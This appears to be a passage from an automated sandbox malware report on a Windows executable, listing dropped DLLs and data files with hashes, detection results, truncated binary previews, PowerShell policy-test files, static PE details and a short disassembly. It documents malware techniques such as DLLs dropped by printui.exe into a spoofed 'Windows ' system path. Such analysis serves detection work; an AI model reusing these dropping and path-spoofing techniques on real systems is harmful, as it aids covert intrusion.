                                                                                            Encrypted:false
                                                                                            SSDEEP:768:fE20UsQSmxsJ/jPxsiFFnoCImovqcyz88rtYNChvThLaim3Yu/g/D8:cis0sP5FBQ7vU9BYshtaim3Yuo78
                                                                                            MD5:9DC829C2C8962347BC9ADF891C51AC05
                                                                                            SHA1:BF9251A7165BB2981E613AC5D9051F19EDB68463
                                                                                            SHA-256:FFE2D56375BB4E8BDEE9037DF6BEFC5016DDD8871D0D85027314DD5792F8FDC9
                                                                                            SHA-512:FD7E6F50A21CB59075DFA08C5E6275FD20723B01A23C3E24FB369F2D95A379B5AC6AE9F509AA42861D9C5114BE47CCE9FF886F0A03758BFDC3A2A9C4D75FAB56
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d..................".....|.....................d.............................P................ ......................................................0..P....................@..h........................... ..(....................................................text...({.......|..................`.P`.data...............................@.P..rdata..............................@.P@.pdata..............................@.0@.xdata..............................@.0@.bss..................................p..edata..............................@.0@.idata..............................@.0..CRT....`...........................@.@..tls....h.... ......................@.`..rsrc...P....0......................@.0..reloc..h....@......................@.0B................................................................................................................................

                                                                                            C:\Windows\System32\ucrtbased.dll

                                                                                            Download File
                                                                                            Process:C:\Windows \System32\printui.exe
                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):1786880
                                                                                            Entropy (8bit):6.056894707447503
                                                                                            Encrypted:false
                                                                                            SSDEEP:24576:JUV0C8E3W4JoceLErS6P0qoc6uoPrT5PgVBHmaw+zrGOzli7Gi0m9ZRXyYk:i8/B90ozghlGJ7js
                                                                                            MD5:C3130CFB00549A5A92DA60E7F79F5FC9
                                                                                            SHA1:56C2E8FB1AF609525B0F732BB67B806BDDAB3752
                                                                                            SHA-256:EEE42EABC546E5AA760F8DF7105FCF505ABFFCB9EC4BF54398436303E407A3F8
                                                                                            SHA-512:29BAB5B441484BDFAC9EC21CD4F0F7454AF05BFD7D77F7D4662AEAEAA0D3E25439D52AA341958E7896701546B4A607D3C7A32715386C78B746DFAE8529A70748
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'.S.c.=.c.=.c.=.j...P.=.c.<...=..}.b.=..}.S.=..}.'.=..}...=..}.u.=..}.b.=..}.b.=.Richc.=.........PE..d...~.!U.........." .................................................................g....`A........................................p........C..................x................... ...............................`...................H............................text............................... ..`.rdata...x.......z..................@..@.data...(Z...`...$...J..............@....pdata..x............n..............@..@.rsrc................2..............@..@.reloc...............8..............@..B........................................................................................................................................................................................................................................................................

                                                                                            C:\Windows\System32\vcruntime140d.dll

                                                                                            Download File
                                                                                            Process:C:\Windows \System32\printui.exe
                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):131920
                                                                                            Entropy (8bit):6.0574531251583865
                                                                                            Encrypted:false
                                                                                            SSDEEP:1536:QB6NlnzaWMj6FBknM+eHLEQE9gHAWdwfP5sd4Sohg7vMHvqZecb399R0BqZEBFP:QBYl5MOcM1HAb1wM0ecb39/0BqZEjP
                                                                                            MD5:F57FB935A9A76E151229F547C2204BBA
                                                                                            SHA1:4021B804469816C3136B40C4CEB44C8D60ED15F5
                                                                                            SHA-256:A77277AF540D411AE33D371CC6F54D7B0A1937E0C14DB7666D32C22FC5DCA9C0
                                                                                            SHA-512:CD9FC3FC460EBA6A1B9F984B794940D28705ECB738DF8595C2341ABE4347141DB14A9FF637C9F902E8742F5C48BBB61DA7D5E231CC5B2BAD2E8746C5A3E3E6ED
                                                                                            Malicious:false
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........].AB<..B<..B<....h.@<....L.A<..B<..l<..yb..I<..yb..V<..yb..Z<..yb..C<..yb\.C<..yb..C<..RichB<..................PE..d....LZW.........." .....j...\......pg....................................... ...........`A...........................................4.......<.......................P?......t...p...T...........................................................................text....h.......j.................. ..`.rdata..F5.......6...n..............@..@.data...............................@....pdata..............................@..@_RDATA..............................@..@.rsrc...............................@..@.reloc..t...........................@..B........................................................................................................................................................................................................................

                                                                                            C:\Windows\System32\winsvcf\winlogsvc

                                                                                            Download File
                                                                                            Process:C:\Windows \System32\printui.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):304
                                                                                            Entropy (8bit):7.295206871811174
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:a1yMwCoeim3JV9R6DuYK6YyjhqdPrKPH7rFf/sIKsIuycKFiBU9kDGko:qiKv76DDN8dPr07rKIXIuyTN9kDGko
                                                                                            MD5:572F8A00881F751BD6CA0613D20E0EA8
                                                                                            SHA1:CD506507CDD36CE65EE65560997CA3D6E317AA20
                                                                                            SHA-256:DE1DDAD90B10E0A449B24BA76B32FBF504D2DB97CC4370A1AB8BC9602E8B5958
                                                                                            SHA-512:AF68CB7DB24395FBA801ECECC204764C8B9ADC868B780734C9CEA01D261EC034B57CE2AB1A1326661EB9FA2DC1AA8D00B7EB08E9D08571DD55D1344BA55F40A5
                                                                                            Malicious:false
                                                                                            Preview:.....S.N....A........)x.a.m..l....w...Q7.....Y.D[.......ip...d9....;._.....H....g..?U.v.q.u..B_8....LF.....%]h8....*6...E...e....a..4..(9:4iM....*.g....wg.`U..&&.c.+.E.w.O.....Z...X...[.D....F.o....E......s..T.n...7.....vJ..iz...aTE$.%....M..e....U5T5f.I... ...>QD.........+i..d..3..n.

                                                                                            C:\Windows\System32\winsvcf\x549596.dat

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):7417856
                                                                                            Entropy (8bit):7.999923823214666
                                                                                            Encrypted:true
                                                                                            SSDEEP:196608:T17lc7yNNvmrX2D367Dyw0b6sreztybRkUmwb6:Flg6+2L67D46s9bWA6
                                                                                            MD5:ADBF946B4222BA62BDAF420D19C6E998
                                                                                            SHA1:84E2DBB828D2927C8E1A3BBACEEA769404970442
                                                                                            SHA-256:756205904CF6AFFD5428390B25F88D94BEB150F69852CC2BB0F49EE3AEB7FBE1
                                                                                            SHA-512:AE30872DD6BCFBD866702AC8E23859BD94E1197DCCABDD5166F61CE20D694204572352C9B9270874D8BBC025E6F55171903995B0C884DC36C5C44114C8E8F59A
                                                                                            Malicious:true
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....Oeg..........."...'.@...>...... ..........E.........................................`... ......................................p..L.......T............@.............................................. :..(...................D................................text....?.......@..................`..`.data.......P......D..............@....rdata..@....0......................@..@.pdata.......@.......(..............@..@.xdata.......P.......,..............@..@.bss....p....`...........................edata..L....p.......0..............@..@.idata..T............2..............@....CRT....X............<..............@....tls.................>..............@....reloc...............@..............@..B........................................................................................................................................................................

                                                                                            C:\Windows\System32\x939048.dat

                                                                                            Download File
                                                                                            Process:C:\Windows \System32\printui.exe
                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):1940480
                                                                                            Entropy (8bit):6.556048550506196
                                                                                            Encrypted:false
                                                                                            SSDEEP:24576:8Eqf7bCPu5W7Ih0lhSMXlFnewf6oV9h0lhSMXln98GzsJP8GLC8h0lhSMXl8z917:8bffWuWRewfv0CP8NBMj
                                                                                            MD5:DD6B814D79B44D3A17EF1175C724F199
                                                                                            SHA1:4B50AD258D2D177F22ED06CE3494DEA67C180B22
                                                                                            SHA-256:ED6BF39B821CF5ECB2E73B6021913B9D6F0FC73A82EE9E9C8B64B2A0EB7E917C
                                                                                            SHA-512:60A92D0FE216ECCF001ABC9D90AB21D459C1442B999D3719129C17814BF529F19EDCB35469ED79691072747E0F57C4C417600B8A398BFC1131F42D324A5FDED2
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                            • Antivirus: ReversingLabs, Detection: 34%
                                                                                            Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......l4.v(U.%(U.%(U.%Z.$.U.%Z.$.U.%9.$"U.%9.$&U.%9.$HU.%..$*U.%Z.$<U.%8.$%U.%G.$*U.%Z.$'U.%(U.%#T.%..$9U.%..$)U.%..z%)U.%..$)U.%Rich(U.%................PE..d....Neg.........." ...*..................................................................`.............................................P...@................@.. y..................p...8.......................(...0...@............@...............................text....,.......................... ..`.rdata.......@.......2..............@..@.data...LO.......0..................@....pdata.. y...@...z..................@..@.fptable............................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................

                                                                                            C:\Windows\System32\zlib1.dll

                                                                                            Download File
                                                                                            Process:C:\Windows \System32\printui.exe
                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):90624
                                                                                            Entropy (8bit):6.509332615593886
                                                                                            Encrypted:false
                                                                                            SSDEEP:1536:Wc9wKxbEwda1CzUbFfbpVxyRyxpGTlKAbe6IOcIOZyyFz5o9X2153:7uKxbEwUEAhbprCOGTKISZyuVo9GT
                                                                                            MD5:F53D1EFEA4855DA42DA07DE49D80BA68
                                                                                            SHA1:920349F4BD5A5B8E77195C81E261DFA2177EB1EE
                                                                                            SHA-256:7E9F43688189578042D791E3E5301165316EDC7C1ED739E0669C033A3CA08037
                                                                                            SHA-512:5D72F64B8E5C42A3C9A7BCBBE8A1598A85402ADE4F312AB9E26869F8B39952A3AA037F2CF7DA89E686C5BC3FCB221FEEAE077B9FFD2EEF98DAC0E307637FE7BD
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b...&.i.&.i.&.i./.....i.6qh.%.i.6q..".i.6qj.%.i.6qm...i.6ql.*.i.Vth.$.i.&.h...i.npm.).i.npi.'.i.np..'.i.&...'.i.npk.'.i.Rich&.i.........PE..d...a..f.........." ...)..................................................................`..........................................O......@W..........P....p..@...............l....>..T...........................`=..@...............x............................text............................... ..`.rdata...l.......n..................@..@.data........`.......L..............@....pdata..@....p.......N..............@..@.rsrc...P............Z..............@..@.reloc..l............`..............@..B........................................................................................................................................................................................................................................

                                                                                            C:\Windows\Temp\__PSScriptPolicyTest_02ha3yoz.y5x.ps1

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                            C:\Windows\Temp\__PSScriptPolicyTest_2x3y5kgk.lu5.ps1

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                            C:\Windows\Temp\__PSScriptPolicyTest_bwuf24py.w0q.ps1

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                            C:\Windows\Temp\__PSScriptPolicyTest_edt1bxfd.0qp.ps1

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                            C:\Windows\Temp\__PSScriptPolicyTest_ee1z3k0s.qzg.psm1

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                            C:\Windows\Temp\__PSScriptPolicyTest_gu3lsllu.nah.ps1

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                            C:\Windows\Temp\__PSScriptPolicyTest_kpo5asxk.olo.psm1

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                            C:\Windows\Temp\__PSScriptPolicyTest_odasid52.jgp.ps1

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                            C:\Windows\Temp\__PSScriptPolicyTest_pqt43zuq.tvq.psm1

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                            C:\Windows\Temp\__PSScriptPolicyTest_sifbvfk0.v4h.psm1

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                            C:\Windows\Temp\__PSScriptPolicyTest_svfm00zq.wlf.psm1

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                            C:\Windows\Temp\__PSScriptPolicyTest_utsp1gnm.uui.psm1

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                            C:\Windows\Temp\__PSScriptPolicyTest_viig1kqk.sll.psm1

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                            C:\Windows\Temp\__PSScriptPolicyTest_vwrdx33q.vk0.ps1

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                            C:\Windows\Temp\__PSScriptPolicyTest_yrvppuwk.mqs.psm1

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                            C:\Windows\Temp\__PSScriptPolicyTest_zu2y31t2.mzr.ps1

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                            Static File Info

                                                                                            General

                                                                                            File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                            Entropy (8bit):6.555556347881242
                                                                                            TrID:
                                                                                            • Win64 Executable GUI (202006/5) 92.65%
                                                                                            • Win64 Executable (generic) (12005/4) 5.51%
                                                                                            • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                            • DOS Executable Generic (2002/1) 0.92%
                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                            File name:58VSNPxrI4.exe
                                                                                            File size:14'664'704 bytes
                                                                                            MD5:228c09c31156d45dfe94195bb34d1399
                                                                                            SHA1:20c6ce4757be1399032b2ac6873dc505c1d02839
                                                                                            SHA256:b76ecfa778793bdf379a63b55d60b4b3941e10b743e48ae3b414b3522212abdb
                                                                                            SHA512:003557ad24f826143a50cce81b56489c7768951ecdfef9b01fe645f5453ae8cf36bd1b2b6e5e3bd8d27131cf3a2d54d20b7c699ae582e2528b65aee8a560f40c
                                                                                            SSDEEP:393216:hPsdXtBcda7nzo7Vd7Qv1CPwDvt3uFRCyGTQP76NuudqfZnXSdEVB3:hITk1
                                                                                            TLSH:4DE68D5AB7A900A9E477C278C5975217F772B81103709BDB1BA496B91F33BD0EE3A700
                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A1E..P+..P+..P+.w....P+.w./..P+.w.(..P+...(..P+.../..P+....._P+.w.*..P+..P*..P+..."..P+......P+...)..P+.Rich.P+.........PE..d..

                                                                                            File Icon

                                                                                            Icon Hash:00928e8e8686b000

                                                                                            Static PE Info

                                                                                            General

                                                                                            Entrypoint:0x140026658
                                                                                            Entrypoint Section:.text
                                                                                            Digitally signed:false
                                                                                            Imagebase:0x140000000
                                                                                            Subsystem:windows gui
                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                            Time Stamp:0x67654F5F [Fri Dec 20 11:05:03 2024 UTC]
                                                                                            TLS Callbacks:
                                                                                            CLR (.Net) Version:
                                                                                            OS Version Major:6
                                                                                            OS Version Minor:0
                                                                                            File Version Major:6
                                                                                            File Version Minor:0
                                                                                            Subsystem Version Major:6
                                                                                            Subsystem Version Minor:0
                                                                                            Import Hash:670a8ec7c6d911c03a319eb0c0fda685

                                                                                            Entrypoint Preview

                                                                                            Instruction
                                                                                            dec eax
                                                                                            sub esp, 28h
                                                                                            call 00007F6760B2AD08h
                                                                                            dec eax
                                                                                            add esp, 28h
                                                                                            jmp 00007F6760B2A24Fh
                                                                                            int3
                                                                                            int3
                                                                                            dec eax
                                                                                            sub esp, 28h
                                                                                            dec ebp
                                                                                            mov eax, dword ptr [ecx+38h]
                                                                                            dec eax
                                                                                            mov ecx, edx
                                                                                            dec ecx
                                                                                            mov edx, ecx
                                                                                            call 00007F6760B2A3E2h
                                                                                            mov eax, 00000001h
                                                                                            dec eax
